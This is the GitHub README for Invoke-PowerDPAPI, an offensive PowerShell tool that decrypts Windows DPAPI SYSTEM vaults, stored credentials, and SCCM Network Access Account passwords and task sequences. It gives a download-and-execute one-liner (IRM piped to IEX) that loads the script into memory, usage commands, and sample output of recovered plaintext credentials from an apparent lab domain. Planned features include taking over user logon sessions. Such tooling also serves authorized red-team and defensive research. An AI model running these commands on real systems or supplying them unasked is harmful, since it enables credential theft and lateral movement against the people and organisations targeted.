Movatterモバイル変換

[0]ホーム
URL:

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

 Sign up
Appearance settings

Decrypt SCCM and DPAPI secrets with Powershell.

License

NotificationsYou must be signed in to change notification settings

The-Viper-One/Invoke-PowerDPAPI

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

Invoke-PowerDPAPI is a PowerShell port of someSharpDPAPI andSharpSCCM functionality.

For the moment this is limited to SYSTEM level functions such as triaging SYSTEM master keys and decrpypting the following secrets:

  • System Vaults
  • System Credentials
  • SCCM NAA accounts (WMI / Disk)
  • SCCM Task Sequences (WMI / Disk)

Future Updates

Not all SharpDPAPI functionality will be implemented into this port. This will be limited to functionality that fits my workflow and code that I believe can be reused in further projects.

Future updates to be completed:

  • User level DPAPI
  • Automate takeover of each user logon session and decrypt each user DPAPI secret
  • SYSTEM Certificates
  • Domain Backup key support

Requirements

❗ Invoke-PowerDPAPI must be executed in a high integrity process

Load into memory

IRM"https://raw.githubusercontent.com/The-Viper-One/Invoke-PowerDPAPI/refs/heads/main/Invoke-PowerDPAPI.ps1"| IEX

Usage

Triage Everything

Runs MachineVaults, MachineCredentials, SCCM_Disk and SCCM_WMI

Invoke-PowerDPAPI MachineTriage

 

Triage MachineVaults

Invoke-PowerDPAPI MachineVaults
[*] Triaging SYSTEM Vaults[*] Triaging Vault Folder: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28  VaultID            : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28  Name               : Web Credentials     guidMasterKey    : {e922342f-143e-4b65-a25b-e83354a47007}    size             : 324    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      :     guidMasterKey    :     size             : 324    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      : Vault Policy Key    aes128 key       : 17D5264E849A7136427830A4835B8669    aes256 key       : 428397F3F8260174A5923BC66CC014CB2D3C4ABAFB5FFBC90D7A959DC4DC817C

 

Triage MachineCredentials

Invoke-PowerDPAPI MachineCredentials
[*] Triaging System CredentialsFolder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials  CredFile           : 3F38B7EDDCC210906994CAC4A9077348    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}    size             : 544    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      : Local Credential Data    guidMasterKey    :     size             : 264    flags            : 0x00000030 (CRYPTPROTECT_SYSTEM)    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      : Local Credential Data    LastWritten      : 6/19/2025 12:18:59 AM    TargetName       : Domain:batch=TaskScheduler:Task:{52340B14-C919-4223-970B-103AAAFE2720}     TargetAlias      :     Comment          :     UserName         : ludus\domainuser     Credential       : password

 

Triage SCCM (WMI and Disk)

Runs SCCM_WMI and SCCM_Disk

Invoke-PowerDPAPI SCCM

 

Triage SCCM (WMI)

Invoke-PowerDPAPI SCCM_WMIInvoke-PowerDPAPI SCCM_WMI-SaveTS# Saves Task Sequences in XML format to PWD
[+] Found 1 Network Access Account(s)[+] Decrypting network access account credentials    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}    size             : 266    flags            : 0x00000000    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      :      guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}    size             : 250    flags            : 0x00000000    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      :      Network Access Username: ludus\sccm_naa_2     Network Access Password: password123 [+] Found 2 Task Sequence(s)[+] Decrypting Task Sequences    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}    size             : 8042    flags            : 0x00000000    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      :  [+]    Task Sequence: <sequence version="3.10">  <step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">    <action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>    <defaultVarList>      <variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">      </variable>      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>    </defaultVarList>  </step></sequence>

 

Triage SCCM (Disk)

Invoke-PowerDPAPI SCCM_DiskInvoke-PowerDPAPI SCCM_Disk-SaveTS# Saves Task Sequences in XML format to PWD
[+] Decrypting 1 network access account secrets    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}    size             : 266    flags            : 0x00000000    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      :      guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}    size             : 250    flags            : 0x00000000    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      :      NetworkAccessUsername: ludus\sccm_naa_2     NetworkAccessPassword: password123 [+] Decrypting 1 task sequence secrets    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}    size             : 2154    flags            : 0x00000000    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)    description      :  <sequence version="3.10">  <step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">    <action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>    <defaultVarList>      <variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">      </variable>      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>    </defaultVarList>  </step></sequence>

 

About

Decrypt SCCM and DPAPI secrets with Powershell.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published
[8]ページ先頭
©2009-2025 Movatter.jp